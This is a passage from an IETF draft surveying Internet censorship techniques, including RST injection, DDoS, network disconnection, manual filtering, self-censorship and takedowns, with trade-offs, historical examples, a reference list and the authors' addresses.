above, is 743 most often paired with identification techniques that require 744 splitting, such as DPI or Protocol Identification. In 2007, Comcast 745 was accused of using RST Packet Injection to interrupt traffic it 746 identified as BitTorrent [Schoen-2007], this later led to a US 747 Federal Communications Commission ruling against Comcast 748 [VonLohmann-2008]. China has also been known to use RST Packet 749 Injection for censorship purposes. This interference is especially 750 evident in the interruption of encrypted/obfuscated protocols, such 751 as those used by Tor [Winter-2012]. 753 4.3. Multi-layer and Non-layer 755 4.3.1. Distributed Denial of Service (DDoS) 757 Distributed Denial of Service attacks are a common attack mechanism 758 used by "hacktivists" and malicious hackers, but censors have used 759 DDoS in the past for a variety of reasons. There is a huge variety 760 of DDoS attacks [Wikip-DoS], but on a high level two possible impacts 761 tend to occur; a flood attack results in the service being unusable 762 while resources are being spent to flood the service, a crash attack 763 aims to crash the service so resources can be reallocated elsewhere 764 without "releasing" the service. 766 *Trade-offs:* DDoS is an appealing mechanism when a censor would like 767 to prevent all access to undesirable content, instead of only access 768 in their region for a limited period of time, but this is really the 769 only uniquely beneficial feature for DDoS as a censorship technique. 770 The resources required to carry out a successful DDoS against major 771 targets are computationally expensive, usually requiring renting or 772 owning a malicious distributed platform such as a botnet, and 773 imprecise. DDoS is an incredibly crude censorship technique, and 774 appears to largely be used as a timely, easy-to-access mechanism for 775 blocking undesirable content for a limited period of time. 777 *Empirical Examples:* In 2012 the U.K.'s GCHQ used DDoS to 778 temporarily shutdown IRC chat rooms frequented by members of 779 Anonymous using the Syn Flood DDoS method; Syn Flood exploits the 780 handshake used by TCP to overload the victim server with so many 781 requests that legitimate traffic becomes slow or impossible 782 [Schone-2014] [CERT-2000]. Dissenting opinion websites are 783 frequently victims of DDoS around politically sensitive events in 784 Burma [Villeneuve-2011]. Controlling parties in Russia 785 [Kravtsova-2012], Zimbabwe [Orion-2013], and Malaysia 786 [Muncaster-2013] have been accused of using DDoS to interrupt 787 opposition support and access during elections. In 2015, China 788 launched a DDoS attack using a true MITM system collocated with the 789 Great Firewall, dubbed "Great Cannon", that was able to inject 790 JavaScript code into web visits to a Chinese search engine that 791 commandeered those user agents to send DDoS traffic to various sites 792 [Marczak-2015]. 794 4.3.2. Network Disconnection or Adversarial Route Announcement 796 While it is perhaps the crudest of all censorship techniques, there 797 is no more effective way of making sure undesirable information isn't 798 allowed to propagate on the web than by shutting off the network. 799 The network can be logically cut off in a region when a censoring 800 body withdraws all of the Boarder Gateway Protocol (BGP) prefixes 801 routing through the censor's country. 803 *Trade-offs:* The impact to a network disconnection in a region is 804 huge and absolute; the censor pays for absolute control over digital 805 information with all the benefits the Internet brings; this is never 806 a long-term solution for any rational censor and is normally only 807 used as a last resort in times of substantial unrest. 809 *Empirical Examples:* Network Disconnections tend to only happen in 810 times of substantial unrest, largely due to the huge social, 811 political, and economic impact such a move has. One of the first, 812 highly covered occurrences was with the Junta in Myanmar employing 813 Network Disconnection to help Junta forces quash a rebellion in 2007 815 [Dobie-2007]. China disconnected the network in the Xinjiang region 816 during unrest in 2009 in an effort to prevent the protests from 817 spreading to other regions [Heacock-2009]. The Arab Spring saw the 818 the most frequent usage of Network Disconnection, with events in 819 Egypt and Libya in 2011 [Cowie-2011] [Cowie-2011b], and Syria in 2012 820 [Thomson-2012]. Russia has indicated that it will attempt to 821 disconnect all Russian networks from the global internet in April 822 2019 as part of a test of the nation's network independence. Reports 823 also indicate that, as part of the test disconnect, Russian telecom 824 firms must route all traffic to state-operated monitoring points. 825 cite ZD Net https://www.zdnet.com/article/russia-to-disconnect-from- 826 the-internet-as-part-of-a-planned-test/ 828 5. Non-Technical Prescription 830 As the name implies, sometimes manpower is the easiest way to figure 831 out which content to block. Manual Filtering differs from the common 832 tactic of building up blacklists in that it doesn't necessarily 833 target a specific IP or DNS, but instead removes or flags content. 834 Given the imprecise nature of automatic filtering, manually sorting 835 through content and flagging dissenting websites, blogs, articles and 836 other media for filtration can be an effective technique. This 837 filtration can occur on the Backbone/ISP level - China's army of 838 monitors is a good example [BBC-2013b] - but more commonly manual 839 filtering occurs on an institutional level. Internet Content 840 Providers such as Google or Weibo, require a business license to 841 operate in China. One of the prerequisites for a business license is 842 an agreement to sign a "voluntary pledge" known as the "Public Pledge 843 on Self-discipline for the Chinese Internet Industry". The failure 844 to "energetically uphold" the pledged values can lead to the ICPs 845 being held liable for the offending content by the Chinese government 846 [BBC-2013b]. 848 6. Non-Technical Interference 850 6.1. Self-Censorship 852 Self-censorship is one of the most interesting and effective types of 853 censorship; a mix of Bentham's Panopticon, cultural manipulation, 854 intelligence gathering, and meatspace enforcement. Simply put, self- 855 censorship is when a censor creates an atmosphere where users censor 856 themselves. This can be achieved through controlling information, 857 intimidating would-be dissidents, swaying public thought, and 858 creating apathy. Self-censorship is difficult to document, as when 859 it is implemented effectively the only noticeable tracing is a lack 860 of undesirable content; instead one must look at the tools and 861 techniques used by censors to encourage self-censorship. Controlling 862 Information relies on traditional censorship techniques, or by 863 forcing all users to connect through an intranet, such as in North 864 Korea. Intimidation is often achieved through allowing Internet 865 users to post "whatever they want," but arresting those who post 866 about dissenting views, this technique is incredibly common 867 [Calamur-2013] [AP-2012] [Hopkins-2011] [Guardian-2014] 868 [Johnson-2010]. A good example of swaying public thought is China's 869 "50-Cent Party," reported to be composed of somewhere between 20,000 870 [Bristow-2013] and 300,000 [Fareed-2008] contributors who are paid to 871 "guide public thought" on local and regional issues as directed by 872 the Ministry of Culture. Creating apathy can be a side-effect of 873 successfully controlling information over time and is ideal for a 874 censorship regime [Gao-2014]. 876 6.2. Domain Name Reallocation 878 Because domain names are resolved recursively, if a root name server 879 reassigns or delists a domain, all other DNS servers will be unable 880 to properly forward and cache the site. Domain name registration is 881 only really a risk where undesirable content is hosted on TLD 882 controlled by the censoring country, such as .cn or .ru 883 [Anderson-2011] or where legal processes in countries like the United 884 States result in domain name seizures and/or DNS redirection by the 885 government [Kopel-2013]. 887 6.3. Server Takedown 889 Servers must have a physical location somewhere in the world. If 890 undesirable content is hosted in the censoring country the servers 891 can be physically seized or the hosting provider can be required to 892 prevent access [Anderson-2011]. 894 6.4. Notice and Takedown 896 In some countries, legal mechanisms exist where an individual can 897 issue a legal request to a content host that requires the host to 898 take down content. Examples include the voluntary systems employed 899 by companies like Google to comply with "Right to be Forgotten" 900 policies in the European Union [Google-RTBF] and the copyright- 901 oriented notice and takedown regime of the United States Digital 902 Millennium Copyright Act (DMCA) Section 512 [DMLP-512]. 904 7. Contributors 906 This document benefited from discussions with Stephane Bortzmeyer, 907 Nick Feamster, and Martin Nilsson. 909 8. Informative References 911 [AFNIC-2013] 912 AFNIC, "Report of the AFNIC Scientific Council: 913 Consequences of DNS-based Internet filtering", 2013, 914 . 917 [AFP-2014] 918 AFP, "China Has Massive Internet Breakdown Reportedly 919 Caused By Their Own Censoring Tools", 2014, 920 . 923 [Albert-2011] 924 Albert, K., "DNS Tampering and the new ICANN gTLD Rules", 925 2011, . 928 [Anderson-2011] 929 Anderson, R. and S. Murdoch, "Access Denied: Tools and 930 Technology of Internet Filtering", 2011, 931 . 934 [Anon-SIGCOMM12] 935 Anonymous, "The Collateral Damage of Internet Censorship 936 by DNS Injection", 2012, 937 . 940 [Anonymous-2007] 941 Anonymous, "How to Bypass Comcast's Bittorrent 942 Throttling", 2012, . 945 [Anonymous-2013] 946 Anonymous, "GitHub blocked in China - how it happened, how 947 to get around it, and where it will take us", 2013, 948 . 952 [Anonymous-2014] 953 Anonymous, "Towards a Comprehensive Picture of the Great 954 Firewall's DNS Censorship", 2014, 955 . 958 [AP-2012] Associated Press, "Sattar Beheshit, Iranian Blogger, Was 959 Beaten In Prison According To Prosecutor", 2012, 960 . 963 [Aryan-2012] 964 Aryan, S., Aryan, H., and J. Halderman, "Internet 965 Censorship in Iran: A First Look", 2012, 966 . 968 [BBC-2013] 969 BBC News, "Google and Microsoft agree steps to block abuse 970 images", 2013, . 972 [BBC-2013b] 973 BBC, "China employs two million microblog monitors state 974 media say", 2013, 975 . 977 [Bortzmayer-2015] 978 Bortzmayer, S., "DNS Censorship (DNS Lies) As Seen By RIPE 979 Atlas", 2015, 980 . 983 [Bristow-2013] 984 Bristow, M., "China's internet 'spin doctors'", 2013, 985 . 987 [Calamur-2013] 988 Calamur, K., "Prominent Egyptian Blogger Arrested", 2013, 989 . 992 [CERT-2000] 993 CERT, "TCP SYN Flooding and IP Spoofing Attacks", 2000, 994 . 997 [Cheng-2010] 998 Cheng, J., "Google stops Hong Kong auto-redirect as China 999 plays hardball", 2010, . 1003 [Clayton-2006] 1004 Clayton, R., "Ignoring the Great Firewall of China", 2006, 1005 . 1007 [Condliffe-2013] 1008 Condliffe, J., "Google Announces Massive New Restrictions 1009 on Child Abuse Search Terms", 2013, . 1013 [Cowie-2011] 1014 Cowie, J., "Egypt Leaves the Internet", 2011, 1015 . 1018 [Cowie-2011b] 1019 Cowie, J., "Libyan Disconnect", 2011, 1020 . 1022 [Crandall-2010] 1023 Crandall, J., "Empirical Study of a National-Scale 1024 Distributed Intrusion Detection System: Backbone-Level 1025 Filtering of HTML Responses in China", 2010, 1026 . 1028 [Dalek-2013] 1029 Dalek, J., "A Method for Identifying and Confirming the 1030 Use of URL Filtering Products for Censorship", 2013, 1031 . 1034 [Ding-1999] 1035 Ding, C., Chi, C., Deng, J., and C. Dong, "Centralized 1036 Content-Based Web Filtering and Blocking: How Far Can It 1037 Go?", 1999, . 1040 [DMLP-512] 1041 Digital Media Law Project, "Protecting Yourself Against 1042 Copyright Claims Based on User Content", 2012, 1043 . 1046 [Dobie-2007] 1047 Dobie, M., "Junta tightens media screw", 2007, 1048 . 1050 [Ensafi-2013] 1051 Ensafi, R., "Detecting Intentional Packet Drops on the 1052 Internet via TCP/IP Side Channels", 2013, 1053 . 1055 [Fareed-2008] 1056 Fareed, M., "China joins a turf war", 2008, 1057 . 1060 [Fifield-2015] 1061 Fifield, D., Lan, C., Hynes, R., Wegmann, P., and V. 1062 Paxson, "Blocking-resistant communication through domain 1063 fronting", 2015, 1064 . 1066 [Gao-2014] 1067 Gao, H., "Tiananmen, Forgotten", 2014, 1068 . 1071 [Glanville-2008] 1072 Glanville, J., "The Big Business of Net Censorship", 2008, 1073 . 1076 [Google-RTBF] 1077 Google, Inc., "Search removal request under data 1078 protection law in Europe", 2015, 1079 . 1082 [Guardian-2014] 1083 The Gaurdian, "Chinese blogger jailed under crackdown on 1084 'internet rumours'", 2014, 1085 . 1088 [Halley-2008] 1089 Halley, B., "How DNS cache poisoning works", 2014, 1090 . 1093 [Heacock-2009] 1094 Heacock, R., "China Shuts Down Internet in Xinjiang Region 1095 After Riots", 2009, . 1098 [Hepting-2011] 1099 Electronic Frontier Foundation, "Hepting vs. AT&T", 2011, 1100 . 1102 [Hjelmvik-2010] 1103 Hjelmvik, E., "Breaking and Improving Protocol 1104 Obfuscation", 2010, 1105 . 1107 [Hopkins-2011] 1108 Hopkins, C., "Communications Blocked in Libya, Qatari 1109 Blogger Arrested: This Week in Online Tyranny", 2011, 1110 . 1113 [Husak-2016] 1114 Husak, M., Cermak, M., Jirsik, T., and P. Celeda, "HTTPS 1115 traffic analysis and client identification using passive 1116 SSL/TLS fingerprinting", 2016, 1117 . 1120 [ICANN-SSAC-2012] 1121 ICANN Security and Stability Advisory Committee (SSAC), 1122 "SAC 056: SSAC Advisory on Impacts of Content Blocking via 1123 the Domain Name System", 2012, 1124 . 1127 [Johnson-2010] 1128 Johnson, L., "Torture feared in arrest of Iraqi blogger", 1129 2011, . 1132 [Jones-2014] 1133 Jones, B., "Automated Detection and Fingerprinting of 1134 Censorship Block Pages", 2014, 1135 . 1138 [Khattak-2013] 1139 Khattak, S., "Towards Illuminating a Censorship Monitor's 1140 Model to Facilitate Evasion", 2013, . 1144 [Kopel-2013] 1145 Kopel, K., "Operation Seizing Our Sites: How the Federal 1146 Government is Taking Domain Names Without Prior Notice", 1147 2013, . 1149 [Kravtsova-2012] 1150 Kravtsova, Y., "Cyberattacks Disrupt Opposition's 1151 Election", 2012, 1152 . 1155 [Marczak-2015] 1156 Marczak, B., Weaver, N., Dalek, J., Ensafi, R., Fifield, 1157 D., McKune, S., Rey, A., Scott-Railton, J., Deibert, R., 1158 and V. Paxson, "An Analysis of China's "Great Cannon"", 1159 2015, 1160 . 1163 [Muncaster-2013] 1164 Muncaster, P., "Malaysian election sparks web blocking/ 1165 DDoS claims", 2013, 1166 . 1169 [Nabi-2013] 1170 Nabi, Z., "The Anatomy of Web Censorship in Pakistan", 1171 2013, . 1174 [Netsec-2011] 1175 n3t2.3c, "TCP-RST Injection", 2011, 1176 . 1178 [Orion-2013] 1179 Orion, E., "Zimbabwe election hit by hacking and DDoS 1180 attacks", 2013, 1181 . 1184 [Porter-2010] 1185 Porter, T., "The Perils of Deep Packet Inspection", 2010, 1186 . 1189 [RFC0793] Postel, J., "Transmission Control Protocol", STD 7, 1190 RFC 793, DOI 10.17487/RFC0793, September 1981, 1191 . 1193 [RFC6066] Eastlake 3rd, D., "Transport Layer Security (TLS) 1194 Extensions: Extension Definitions", RFC 6066, 1195 DOI 10.17487/RFC6066, January 2011, 1196 . 1198 [RFC7624] Barnes, R., Schneier, B., Jennings, C., Hardie, T., 1199 Trammell, B., Huitema, C., and D. Borkmann, 1200 "Confidentiality in the Face of Pervasive Surveillance: A 1201 Threat Model and Problem Statement", RFC 7624, 1202 DOI 10.17487/RFC7624, August 2015, 1203 . 1205 [RFC7754] Barnes, R., Cooper, A., Kolkman, O., Thaler, D., and E. 1206 Nordmark, "Technical Considerations for Internet Service 1207 Blocking and Filtering", RFC 7754, DOI 10.17487/RFC7754, 1208 March 2016, . 1210 [RSF-2005] 1211 Reporters Sans Frontieres, "Technical ways to get around 1212 censorship", 2005, . 1215 [Rushe-2015] 1216 Rushe, D., "Bing censoring Chinese language search results 1217 for users in the US", 2013, 1218 . 1221 [Sandvine-2014] 1222 Sandvine, "Technology Showcase on Traffic Classification: 1223 Why Measurements and Freeform Policy Matter", 2014, 1224 . 1228 [Schoen-2007] 1229 Schoen, S., "EFF tests agree with AP: Comcast is forging 1230 packets to interfere with user traffic", 2007, 1231 . 1234 [Schone-2014] 1235 Schone, M., Esposito, R., Cole, M., and G. Greenwald, 1236 "Snowden Docs Show UK Spies Attacked Anonymous, Hackers", 1237 2014, . 1241 [Senft-2013] 1242 Senft, A., "Asia Chats: Analyzing Information Controls and 1243 Privacy in Asian Messaging Applications", 2013, 1244 . 1248 [Shbair-2015] 1249 Shbair, W., Cholez, T., Goichot, A., and I. Chrisment, 1250 "Efficiently Bypassing SNI-based HTTPS Filtering", 2015, 1251 . 1253 [Sophos-2015] 1254 Sophos, "Understanding Sophos Web Filtering", 2015, 1255 . 1258 [Tang-2016] 1259 Tang, C., "In-depth analysis of the Great Firewall of 1260 China", 2016, 1261 . 1264 [Thomson-2012] 1265 Thomson, I., "Syria Cuts off Internet and Mobile 1266 Communication", 2012, 1267 . 1270 [Trustwave-2015] 1271 Trustwave, "Filter: SNI extension feature and HTTPS 1272 blocking", 2015, 1273 . 1276 [Verkamp-2012] 1277 Verkamp, J. and M. Gupta, "Inferring Mechanics of Web 1278 Censorship Around the World", 2012, 1279 . 1282 [Villeneuve-2011] 1283 Villeneuve, N., "Open Access: Chapter 8, Control and 1284 Resistance, Attacks on Burmese Opposition Media", 2011, 1285 . 1288 [VonLohmann-2008] 1289 VonLohmann, F., "FCC Rules Against Comcast for BitTorrent 1290 Blocking", 2008, . 1293 [Wagner-2009] 1294 Wagner, B., "Deep Packet Inspection and Internet 1295 Censorship: International Convergence on an 'Integrated 1296 Technology of Control'", 2009, 1297 . 1301 [Wagstaff-2013] 1302 Wagstaff, J., "In Malaysia, online election battles take a 1303 nasty turn", 2013, 1304 . 1307 [Weaver-2009] 1308 Weaver, N., Sommer, R., and V. Paxson, "Detecting Forged 1309 TCP Packets", 2009, . 1312 [Whittaker-2013] 1313 Whittaker, Z., "1,168 keywords Skype uses to censor, 1314 monitor its Chinese users", 2013, 1315 . 1318 [Wikip-DoS] 1319 Wikipedia, "Denial of Service Attacks", 2016, 1320 . 1323 [Wilde-2012] 1324 Wilde, T., "Knock Knock Knockin' on Bridges Doors", 2012, 1325 . 1328 [Winter-2012] 1329 Winter, P., "How China is Blocking Tor", 2012, 1330 . 1332 [Zhu-2011] 1333 Zhu, T., "An Analysis of Chinese Search Engine Filtering", 1334 2011, 1335 . 1337 [Zmijewki-2014] 1338 Zmijewki, E., "Turkish Internet Censorship Takes a New 1339 Turn", 2014, . 1342 Authors' Addresses 1344 Joseph Lorenzo Hall 1345 CDT 1347 Email: joe@cdt.org 1349 Michael D. Aaron 1350 CU Boulder 1352 Email: michael.aaron@colorado.edu 1354 Stan Adams 1355 CDT 1357 Email: sadams@cdt.org 1359 Ben Jones 1360 Princeton 1362 Email: bj6@cs.princeton.edu 1364 Nick Feamster 1365 Princeton 1367 Email: feamster@cs.princeton.edu